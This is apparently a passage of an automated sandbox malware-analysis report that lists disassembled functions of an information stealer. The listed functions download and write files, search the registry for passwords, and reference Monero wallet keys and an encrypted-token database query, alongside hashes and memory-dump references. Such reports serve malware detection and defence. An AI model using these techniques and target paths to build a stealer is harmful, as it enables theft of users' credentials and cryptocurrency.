                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 442d42bedb3ed296bdec53bd6b89c1da400e142e170f7c8474c523099f196714
                  • Instruction ID: 48b1e7334e51ecdc54b07fb1bbf6b29cc0ee087c1830487d6699a4173f90edaa
                  • Opcode Fuzzy Hash: 442d42bedb3ed296bdec53bd6b89c1da400e142e170f7c8474c523099f196714
                  • Instruction Fuzzy Hash: 65215CB1E44608ABDB10DFD4DC49FAFBBB8FB44B04F204209F605BB290C77869018BA5
                  Function 001360A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                    • Part of subcall function 001347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00134839
                    • Part of subcall function 001347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00134849
                  • InternetOpenA.WININET(00150DF7,00000001,00000000,00000000,00000000), ref: 0013610F
                  • StrCmpCA.SHLWAPI(?,0102E470), ref: 00136147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0013618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001361B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 001361DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0013620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00136249
                  • InternetCloseHandle.WININET(?), ref: 00136253
                  • InternetCloseHandle.WININET(00000000), ref: 00136260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 51ee8385ae17ae5db7b10c580a2eb4ba799b3a8b1cef7f1e908014fbdc588643
                  • Instruction ID: a9f40e8904d1fdb7ff34cedb237bd74aab06b6cbc149e48d8f82fec3ccbbc6ec
                  • Opcode Fuzzy Hash: 51ee8385ae17ae5db7b10c580a2eb4ba799b3a8b1cef7f1e908014fbdc588643
                  • Instruction Fuzzy Hash: 1C5171B1940218ABEB24DF90DC45BEE77B8FF44705F118098B609A71C1DB74AA85CFA5
                  Function 001372D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0013733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001373B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0013740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00137452
                  • HeapFree.KERNEL32(00000000), ref: 00137459
                  • task.LIBCPMTD ref: 00137555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: bb770ac6e5db9d2f6d24b84d644f3c1403fa5de7d832148918a133d6019cd086
                  • Instruction ID: daba80701830ba63580a8eb11815c60047e14465e48efbe206c55e1ca6a1eb6c
                  • Opcode Fuzzy Hash: bb770ac6e5db9d2f6d24b84d644f3c1403fa5de7d832148918a133d6019cd086
                  • Instruction Fuzzy Hash: 08611EB590425C9BDB24DB50DD45BDAB7B8BF58300F0081E9F689A6181DB706FC9CF91
                  Function 0013BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                  • lstrlen.KERNEL32(00000000), ref: 0013BC9F
                    • Part of subcall function 00148E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00148E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0013BCCD
                  • lstrlen.KERNEL32(00000000), ref: 0013BDA5
                  • lstrlen.KERNEL32(00000000), ref: 0013BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 73931084ddf6eb40afe09223271a6be499a6fb5700d77c5963d208433fbd1600
                  • Instruction ID: 79c97295d1cb93e254c5558e99fbba613f94379da11af006c00e692112dd7eac
                  • Opcode Fuzzy Hash: 73931084ddf6eb40afe09223271a6be499a6fb5700d77c5963d208433fbd1600
                  • Instruction Fuzzy Hash: 2FB16671950104ABEB14FBA0DC96EEE733CFF64305F814558F506A70A1EF346A49CB62
                  Function 00146770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 55815734e8f91df5bbe8cf51da097b4f829190d1e2fd28b4192d69e18fa751e9
                  • Instruction ID: c4beacd19761bd59e5db2820296990456b723f05e9cf09ebf85e1993366a7a52
                  • Opcode Fuzzy Hash: 55815734e8f91df5bbe8cf51da097b4f829190d1e2fd28b4192d69e18fa751e9
                  • Instruction Fuzzy Hash: A4F08231904249EFD3599FE0E90972C7B78FB45707F140198F61D86290D6744BC2DB97
                  Function 00134FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00134FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00134FD1
                  • InternetOpenA.WININET(00150DDF,00000000,00000000,00000000,00000000), ref: 00134FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00135011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00135041
                  • InternetCloseHandle.WININET(?), ref: 001350B9
                  • InternetCloseHandle.WININET(?), ref: 001350C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: f8c78b723a87982b71414394841b540ef6bc998242966d315b2ed2a9e92246e7
                  • Instruction ID: c8550823bd0e6ff2176ee3de7545b97ae70e0d8e0ff8f62080c86bbfc0123b8f
                  • Opcode Fuzzy Hash: f8c78b723a87982b71414394841b540ef6bc998242966d315b2ed2a9e92246e7
                  • Instruction Fuzzy Hash: B13116B4A40218EBDB24CF94DC85BDCB7B9EB48704F5081D8FA09A7280C7706EC58F99
                  Function 001483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00148426
                  • wsprintfA.USER32 ref: 00148459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0014847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0014848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00148499
                    • Part of subcall function 0014A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0014A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0102DD88,00000000,000F003F,?,00000400), ref: 001484EC
                  • lstrlen.KERNEL32(?), ref: 00148501
                  • RegQueryValueExA.ADVAPI32(00000000,0102DC80,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00150B34), ref: 00148599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00148608
                  • RegCloseKey.ADVAPI32(00000000), ref: 0014861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 02b23f9e992b3d9c760549fae5dbc2bd3da5e520700808ba43520ef2f1e35ce4
                  • Instruction ID: 7ef4c873f79e227427aca6b568ed189a70494faa1f7bcfabbaee0ba0b9d54a21
                  • Opcode Fuzzy Hash: 02b23f9e992b3d9c760549fae5dbc2bd3da5e520700808ba43520ef2f1e35ce4
                  • Instruction Fuzzy Hash: 3C2119B1940218ABDB64DB54DC85FE9B7B8FB88701F00C1D8E609A6190DF716AC6CFD5
                  Function 00147690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001476A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 001476AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0101BB60,00000000,00020119,00000000), ref: 001476DD
                  • RegQueryValueExA.ADVAPI32(00000000,0102DDA0,00000000,00000000,?,000000FF), ref: 001476FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00147708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: 2624609dcc71c1ad718b5c04e9d5a3521c01a517ff5b3444d82d663e9e1aff4e
                  • Instruction ID: 05538406aa1870f23388c00eb59e191066b7f00a955c5b0b760663e9f4601815
                  • Opcode Fuzzy Hash: 2624609dcc71c1ad718b5c04e9d5a3521c01a517ff5b3444d82d663e9e1aff4e
                  • Instruction Fuzzy Hash: B0018FB4A04204BBE711DBE0DC4DF6DB7BCEB88702F004054FA08A72D1D77099408B52
                  Function 00147720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0014773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0101BB60,00000000,00020119,001476B9), ref: 0014775B
                  • RegQueryValueExA.ADVAPI32(001476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0014777A
                  • RegCloseKey.ADVAPI32(001476B9), ref: 00147784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 79d8a6d59b58cff7a8c705df157deeb83b3126eb9f5ddfafd2af7bdeb31b339c
                  • Instruction ID: e6799855b1d511b7347bd20f28d945189ba2ee7e65b7184a7dba7de1607b60b7
                  • Opcode Fuzzy Hash: 79d8a6d59b58cff7a8c705df157deeb83b3126eb9f5ddfafd2af7bdeb31b339c
                  • Instruction Fuzzy Hash: A90144B5A40308BBE711DBE4DC49FAEB7BCEB88705F004554FA09A7291D77055408B52
                  Function 001399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001399EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00139A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00139A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,0013148F,00000000), ref: 00139A5A
                  • LocalFree.KERNEL32(0013148F), ref: 00139A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00139A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 5f707b6959b40490b07f2a7dea36bf69a565b29dfb5c51bc33a58a76edc1620e
                  • Instruction ID: dbfbe56d834c20ffb82fc57e1924060dccb1a30ac841b4aa3903ed611d83e3d0
                  • Opcode Fuzzy Hash: 5f707b6959b40490b07f2a7dea36bf69a565b29dfb5c51bc33a58a76edc1620e
                  • Instruction Fuzzy Hash: A1312DB4A00209EFDB24DF94D985BAE77B9FF48341F108258E915A7290D778A981CFA1
                  Function 00144780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,0102DF80), ref: 001447DB
                    • Part of subcall function 00148DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00148E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00144801
                  • lstrcat.KERNEL32(?,?), ref: 00144820
                  • lstrcat.KERNEL32(?,?), ref: 00144834
                  • lstrcat.KERNEL32(?,0101AED8), ref: 00144847
                  • lstrcat.KERNEL32(?,?), ref: 0014485B
                  • lstrcat.KERNEL32(?,0102D318), ref: 0014486F
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
